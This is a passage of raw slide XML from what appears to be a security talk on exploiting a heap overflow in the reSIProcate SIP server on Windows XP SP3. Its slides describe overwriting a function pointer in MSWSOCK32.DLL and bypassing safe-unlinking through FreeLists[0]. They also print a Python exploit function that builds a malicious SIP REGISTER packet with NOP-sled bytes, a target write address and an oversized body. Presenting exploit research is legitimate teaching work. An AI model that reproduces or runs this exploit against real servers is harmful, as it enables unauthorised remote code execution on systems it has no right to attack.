                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>                                                                the vulnerable code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:transition>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9" name="TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534600" y="4590000"/>
            <a:ext cx="11217600" cy="1145160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Century Gothic"/>
              <a:buChar char="Θ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>MSWSOCK32.DLL usually loaded at specific base address</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Century Gothic"/>
              <a:buChar char="Θ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Inside MSWSOCK32.DLL the following code is executed repeatedly:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Century Gothic"/>
              <a:buChar char="Θ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Overwrite the address at 0x71a87210 so it will point to attacker controlled heap buffer, and make it contain 0xCAFEBABE at EAX+0x20</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1693"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="540" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619280" y="371520"/>
            <a:ext cx="11245320" cy="609120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>reSIProcate heap overflow vulnerability: XP SP3 exploit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="541" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2647800" y="3316680"/>
            <a:ext cx="6248160" cy="516600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="fef88a"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>0x71A53F8F:    mov    eax, dword ptr [0x71a87210]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="fef88a"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="fef88a"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>0x71A53F94:    call    dword ptr [eax + 0x20]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:transition>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2" name="TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="424080" y="1909440"/>
            <a:ext cx="11217600" cy="742320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Arbitrary code execution on Windows XP SP3 (bypassing safe-unlinking check using FreeLists[0] technique)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619280" y="419040"/>
            <a:ext cx="10267560" cy="559800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>reSIProcate heap overflow vulnerability: XP SP3 exploit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="544" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1026720" y="2854800"/>
            <a:ext cx="10012320" cy="2645640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="d1d4d5"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="e3e5e5"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="13500000"/>
          </a:gradFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="0000ff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="ff00ff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>exploit_server_heap_overflow_windows_xp_sp3</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>connection</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="0000ff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>global</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> username</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> server</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> via </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>buffer_length </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>0x20</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>23</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b"\x90"</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b"\xBE\xBA\xFE\xCA"</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lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>234</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b"\x90“ </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>register_packet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b"REGISTER "</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>b"sip                                       :"</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>encode</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>()+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>b" SIP/2.0\x0d\x0aVia: SIP/2.0/TCP "</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via</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>encode</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>()</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b"\x0d\x0aContact: &lt;sip:"</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username</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>encode</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>()</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via</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>encode</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>()</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b"&gt;\x0d\x0aTo: &lt;sip:"</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username</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>encode</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>()</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server</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>encode</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>()</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b";transport=TCP&gt;\x0d\x0aFrom: &lt;sip:"</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username</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>encode</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>()</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server</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>encode</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>()</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b"&gt;\x0d\x0aCSeq: 1 REGISTER\x0d\x0aExpires: 600\x0d\x0aContent-Length: "</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b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>"%ld"</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buffer_length</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>encode</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>()</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b"\x0d\x0a\x0d\x0a"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>write_address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b"\x10\x72\xA8\x71“</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>oversized_packet </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>=</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buffer_length </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>220</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>)</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b"X"</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write_address </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>1024</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>b"X"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
